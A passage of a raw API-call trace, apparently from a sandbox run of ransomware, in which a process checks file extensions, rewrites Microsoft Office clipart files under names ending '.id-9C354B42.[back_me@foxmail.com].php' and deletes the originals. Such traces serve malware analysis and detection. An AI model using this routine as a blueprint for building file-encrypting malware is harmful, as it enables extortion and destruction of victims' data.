(lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107314.WMF") returned 63 [0261.882] lstrlenW (lpString=".1cd") returned 4 [0261.882] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0261.882] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107314.WMF") returned 63 [0261.882] lstrlenW (lpString=".jpg") returned 4 [0261.882] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0261.883] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107314.WMF") returned 63 [0261.883] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107314.WMF") returned 63 [0261.883] lstrlenW (lpString=".doc") returned 4 [0261.883] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0261.883] lstrlenW (lpString=".docx") returned 5 [0261.883] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1 [0261.883] lstrlenW (lpString=".pdf") returned 4 [0261.883] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0261.883] lstrlenW (lpString=".xls") returned 4 [0261.883] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0261.883] lstrlenW (lpString=".xlsx") returned 5 [0261.883] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1 [0261.883] lstrlenW (lpString=".ppt") returned 4 [0261.883] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0261.883] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107314.WMF") returned 63 [0261.883] lstrlenW (lpString=".zip") returned 4 [0261.883] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0261.883] lstrlenW (lpString=".rar") returned 4 [0261.883] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0261.883] lstrlenW (lpString=".bz2") returned 4 [0261.883] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0261.883] lstrlenW (lpString=".7z") returned 3 [0261.883] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0261.883] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107314.WMF") returned 63 [0261.883] lstrlenW (lpString=".dbf") returned 4 [0261.883] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0261.883] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107314.WMF") returned 63 [0261.883] lstrlenW (lpString=".1cd") returned 4 [0261.883] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0261.883] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107314.WMF") returned 63 [0261.883] lstrlenW (lpString=".jpg") returned 4 [0261.883] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0261.884] lstrcmpiW (lpString1=".WMF", lpString2=".php") returned 1 [0261.884] lstrlenW (lpString="J0107514.WMF") returned 12 [0261.884] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107514.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107514.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e0 [0262.009] GetFileSizeEx (in: hFile=0x3e0, lpFileSize=0x36aff1c | out: lpFileSize=0x36aff1c*=12204) returned 1 [0262.013] CloseHandle (hObject=0x3e0) returned 1 [0262.014] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107514.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107514.wmf")) returned 0x20 [0262.020] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107514.WMF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107514.wmf.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0262.020] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107514.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107514.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e0 [0262.020] SetFilePointerEx (in: hFile=0x3e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x36afec8 | out: lpNewFilePointer=0x0) returned 1 [0262.020] SetFilePointerEx (in: hFile=0x3e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x36afec8 | out: lpNewFilePointer=0x0) returned 1 [0262.020] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107514.WMF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107514.wmf.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0262.021] GetLastError () returned 0x0 [0262.021] ReadFile (in: hFile=0x3e0, lpBuffer=0x4290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x36afed4, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesRead=0x36afed4*=0x2fac, lpOverlapped=0x0) returned 1 [0262.022] WriteFile (in: hFile=0x208, lpBuffer=0x4290020*, nNumberOfBytesToWrite=0x2fb0, lpNumberOfBytesWritten=0x36afc9c, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesWritten=0x36afc9c*=0x2fb0, lpOverlapped=0x0) returned 1 [0262.023] ReadFile (in: hFile=0x3e0, lpBuffer=0x4290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x36afed4, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesRead=0x36afed4*=0x0, lpOverlapped=0x0) returned 1 [0262.023] WriteFile (in: hFile=0x208, lpBuffer=0x4290020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x36afc9c, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesWritten=0x36afc9c*=0xec, lpOverlapped=0x0) returned 1 [0262.023] SetEndOfFile (hFile=0x208) returned 1 [0262.023] CloseHandle (hObject=0x208) returned 1 [0262.023] SetFilePointerEx (in: hFile=0x3e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x36afec8 | out: lpNewFilePointer=0x0) returned 1 [0262.023] SetEndOfFile (hFile=0x3e0) returned 1 [0262.025] CloseHandle (hObject=0x3e0) returned 1 [0262.026] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107514.WMF.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0262.026] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107514.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107514.wmf")) returned 1 [0262.026] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107514.WMF") returned 63 [0262.026] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107514.WMF") returned 63 [0262.026] lstrlenW (lpString=".doc") returned 4 [0262.026] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0262.026] lstrlenW (lpString=".docx") returned 5 [0262.026] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1 [0262.026] lstrlenW (lpString=".pdf") returned 4 [0262.026] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0262.026] lstrlenW (lpString=".xls") returned 4 [0262.026] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0262.026] lstrlenW (lpString=".xlsx") returned 5 [0262.026] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1 [0262.026] lstrlenW (lpString=".ppt") returned 4 [0262.026] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0262.026] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107514.WMF") returned 63 [0262.026] lstrlenW (lpString=".zip") returned 4 [0262.026] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0262.026] lstrlenW (lpString=".rar") returned 4 [0262.026] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0262.026] lstrlenW (lpString=".bz2") returned 4 [0262.027] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0262.027] lstrlenW (lpString=".7z") returned 3 [0262.027] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0262.027] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107514.WMF") returned 63 [0262.027] lstrlenW (lpString=".dbf") returned 4 [0262.027] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0262.027] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107514.WMF") returned 63 [0262.027] lstrlenW (lpString=".1cd") returned 4 [0262.027] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0262.027] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107514.WMF") returned 63 [0262.027] lstrlenW (lpString=".jpg") returned 4 [0262.027] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0262.027] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107514.WMF") returned 63 [0262.027] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107514.WMF") returned 63 [0262.027] lstrlenW (lpString=".doc") returned 4 [0262.027] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0262.027] lstrlenW (lpString=".docx") returned 5 [0262.027] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1 [0262.027] lstrlenW (lpString=".pdf") returned 4 [0262.027] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0262.027] lstrlenW (lpString=".xls") returned 4 [0262.027] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0262.027] lstrlenW (lpString=".xlsx") returned 5 [0262.027] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1 [0262.027] lstrlenW (lpString=".ppt") returned 4 [0262.027] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0262.027] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107514.WMF") returned 63 [0262.027] lstrlenW (lpString=".zip") returned 4 [0262.027] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0262.027] lstrlenW (lpString=".rar") returned 4 [0262.027] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0262.027] lstrlenW (lpString=".bz2") returned 4 [0262.027] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0262.028] lstrlenW (lpString=".7z") returned 3 [0262.028] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0262.028] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107514.WMF") returned 63 [0262.028] lstrlenW (lpString=".dbf") returned 4 [0262.028] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0262.028] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107514.WMF") returned 63 [0262.028] lstrlenW (lpString=".1cd") returned 4 [0262.028] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0262.028] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107514.WMF") returned 63 [0262.028] lstrlenW (lpString=".jpg") returned 4 [0262.028] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0262.028] lstrcmpiW (lpString1=".WMF", lpString2=".php") returned 1 [0262.028] lstrlenW (lpString="J0107742.WMF") returned 12 [0262.028] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107742.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107742.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e0 [0262.028] GetFileSizeEx (in: hFile=0x3e0, lpFileSize=0x36aff1c | out: lpFileSize=0x36aff1c*=3644) returned 1 [0262.028] CloseHandle (hObject=0x3e0) returned 1 [0262.028] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107742.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107742.wmf")) returned 0x20 [0262.028] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107742.WMF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107742.wmf.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0262.029] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107742.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107742.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e0 [0262.029] SetFilePointerEx (in: hFile=0x3e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x36afec8 | out: lpNewFilePointer=0x0) returned 1 [0262.029] SetFilePointerEx (in: hFile=0x3e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x36afec8 | out: lpNewFilePointer=0x0) returned 1 [0262.029] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107742.WMF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107742.wmf.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0262.029] GetLastError () returned 0x0 [0262.029] ReadFile (in: hFile=0x3e0, lpBuffer=0x4290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x36afed4, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesRead=0x36afed4*=0xe3c, lpOverlapped=0x0) returned 1 [0262.031] WriteFile (in: hFile=0x208, lpBuffer=0x4290020*, nNumberOfBytesToWrite=0xe40, lpNumberOfBytesWritten=0x36afc9c, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesWritten=0x36afc9c*=0xe40, lpOverlapped=0x0) returned 1 [0262.032] ReadFile (in: hFile=0x3e0, lpBuffer=0x4290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x36afed4, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesRead=0x36afed4*=0x0, lpOverlapped=0x0) returned 1 [0262.032] WriteFile (in: hFile=0x208, lpBuffer=0x4290020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x36afc9c, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesWritten=0x36afc9c*=0xec, lpOverlapped=0x0) returned 1 [0262.032] SetEndOfFile (hFile=0x208) returned 1 [0262.032] CloseHandle (hObject=0x208) returned 1 [0262.032] SetFilePointerEx (in: hFile=0x3e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x36afec8 | out: lpNewFilePointer=0x0) returned 1 [0262.032] SetEndOfFile (hFile=0x3e0) returned 1 [0262.034] CloseHandle (hObject=0x3e0) returned 1 [0262.034] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107742.WMF.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0262.034] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107742.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107742.wmf")) returned 1 [0262.035] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107742.WMF") returned 63 [0262.035] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107742.WMF") returned 63 [0262.035] lstrlenW (lpString=".doc") returned 4 [0262.035] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0262.035] lstrlenW (lpString=".docx") returned 5 [0262.035] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1 [0262.035] lstrlenW (lpString=".pdf") returned 4 [0262.035] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0262.035] lstrlenW (lpString=".xls") returned 4 [0262.035] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0262.035] lstrlenW (lpString=".xlsx") returned 5 [0262.035] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1 [0262.035] lstrlenW (lpString=".ppt") returned 4 [0262.035] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0262.035] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107742.WMF") returned 63 [0262.035] lstrlenW (lpString=".zip") returned 4 [0262.035] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0262.035] lstrlenW (lpString=".rar") returned 4 [0262.035] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0262.035] lstrlenW (lpString=".bz2") returned 4 [0262.035] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0262.035] lstrlenW (lpString=".7z") returned 3 [0262.035] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0262.035] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107742.WMF") returned 63 [0262.035] lstrlenW (lpString=".dbf") returned 4 [0262.035] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0262.035] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107742.WMF") returned 63 [0262.035] lstrlenW (lpString=".1cd") returned 4 [0262.035] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0262.035] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107742.WMF") returned 63 [0262.035] lstrlenW (lpString=".jpg") returned 4 [0262.036] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0262.036] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107742.WMF") returned 63 [0262.036] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107742.WMF") returned 63 [0262.036] lstrlenW (lpString=".doc") returned 4 [0262.036] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0262.036] lstrlenW (lpString=".docx") returned 5 [0262.036] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1 [0262.036] lstrlenW (lpString=".pdf") returned 4 [0262.036] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0262.036] lstrlenW (lpString=".xls") returned 4 [0262.036] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0262.036] lstrlenW (lpString=".xlsx") returned 5 [0262.036] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1 [0262.036] lstrlenW (lpString=".ppt") returned 4 [0262.036] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0262.036] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107742.WMF") returned 63 [0262.036] lstrlenW (lpString=".zip") returned 4 [0262.036] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0262.036] lstrlenW (lpString=".rar") returned 4 [0262.036] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0262.036] lstrlenW (lpString=".bz2") returned 4 [0262.036] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0262.036] lstrlenW (lpString=".7z") returned 3 [0262.036] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0262.036] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107742.WMF") returned 63 [0262.036] lstrlenW (lpString=".dbf") returned 4 [0262.036] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0262.036] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107742.WMF") returned 63 [0262.036] lstrlenW (lpString=".1cd") returned 4 [0262.036] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0262.036] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107742.WMF") returned 63 [0262.036] lstrlenW (lpString=".jpg") returned 4 [0262.036] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0262.037] lstrcmpiW (lpString1=".WMF", lpString2=".php") returned 1 [0262.037] lstrlenW (lpString="J0107744.WMF") returned 12 [0262.037] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107744.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107744.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0262.039] GetFileSizeEx (in: hFile=0x208, lpFileSize=0x36aff1c | out: lpFileSize=0x36aff1c*=5004) returned 1 [0262.039] CloseHandle (hObject=0x208) returned 1 [0262.039] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107744.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107744.wmf")) returned 0x20 [0262.039] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107744.WMF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107744.wmf.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0262.039] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107744.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107744.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0262.039] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x36afec8 | out: lpNewFilePointer=0x0) returned 1 [0262.039] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x36afec8 | out: lpNewFilePointer=0x0) returned 1 [0262.039] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107744.WMF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107744.wmf.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3cc [0262.039] GetLastError () returned 0x0 [0262.040] ReadFile (in: hFile=0x208, lpBuffer=0x4290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x36afed4, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesRead=0x36afed4*=0x138c, lpOverlapped=0x0) returned 1 [0262.042] WriteFile (in: hFile=0x3cc, lpBuffer=0x4290020*, nNumberOfBytesToWrite=0x1390, lpNumberOfBytesWritten=0x36afc9c, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesWritten=0x36afc9c*=0x1390, lpOverlapped=0x0) returned 1 [0262.043] ReadFile (in: hFile=0x208, lpBuffer=0x4290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x36afed4, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesRead=0x36afed4*=0x0, lpOverlapped=0x0) returned 1 [0262.043] WriteFile (in: hFile=0x3cc, lpBuffer=0x4290020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x36afc9c, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesWritten=0x36afc9c*=0xec, lpOverlapped=0x0) returned 1 [0262.043] SetEndOfFile (hFile=0x3cc) returned 1 [0262.043] CloseHandle (hObject=0x3cc) returned 1 [0262.043] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x36afec8 | out: lpNewFilePointer=0x0) returned 1 [0262.043] SetEndOfFile (hFile=0x208) returned 1 [0262.046] CloseHandle (hObject=0x208) returned 1 [0262.046] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107744.WMF.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0262.046] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107744.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107744.wmf")) returned 1 [0262.047] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107744.WMF") returned 63 [0262.047] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107744.WMF") returned 63 [0262.047] lstrlenW (lpString=".doc") returned 4 [0262.047] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0262.047] lstrlenW (lpString=".docx") returned 5 [0262.047] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1 [0262.047] lstrlenW (lpString=".pdf") returned 4 [0262.047] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0262.047] lstrlenW (lpString=".xls") returned 4 [0262.047] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0262.047] lstrlenW (lpString=".xlsx") returned 5 [0262.047] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1 [0262.047] lstrlenW (lpString=".ppt") returned 4 [0262.047] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0262.047] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107744.WMF") returned 63 [0262.047] lstrlenW (lpString=".zip") returned 4 [0262.047] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0262.047] lstrlenW (lpString=".rar") returned 4 [0262.048] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0262.048] lstrlenW (lpString=".bz2") returned 4 [0262.048] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0262.048] lstrlenW (lpString=".7z") returned 3 [0262.048] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0262.048] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107744.WMF") returned 63 [0262.048] lstrlenW (lpString=".dbf") returned 4 [0262.048] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0262.048] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107744.WMF") returned 63 [0262.048] lstrlenW (lpString=".1cd") returned 4 [0262.048] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0262.048] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107744.WMF") returned 63 [0262.048] lstrlenW (lpString=".jpg") returned 4 [0262.048] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0262.048] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107744.WMF") returned 63 [0262.048] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107744.WMF") returned 63 [0262.048] lstrlenW (lpString=".doc") returned 4 [0262.048] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0262.048] lstrlenW (lpString=".docx") returned 5 [0262.048] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1 [0262.048] lstrlenW (lpString=".pdf") returned 4 [0262.048] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 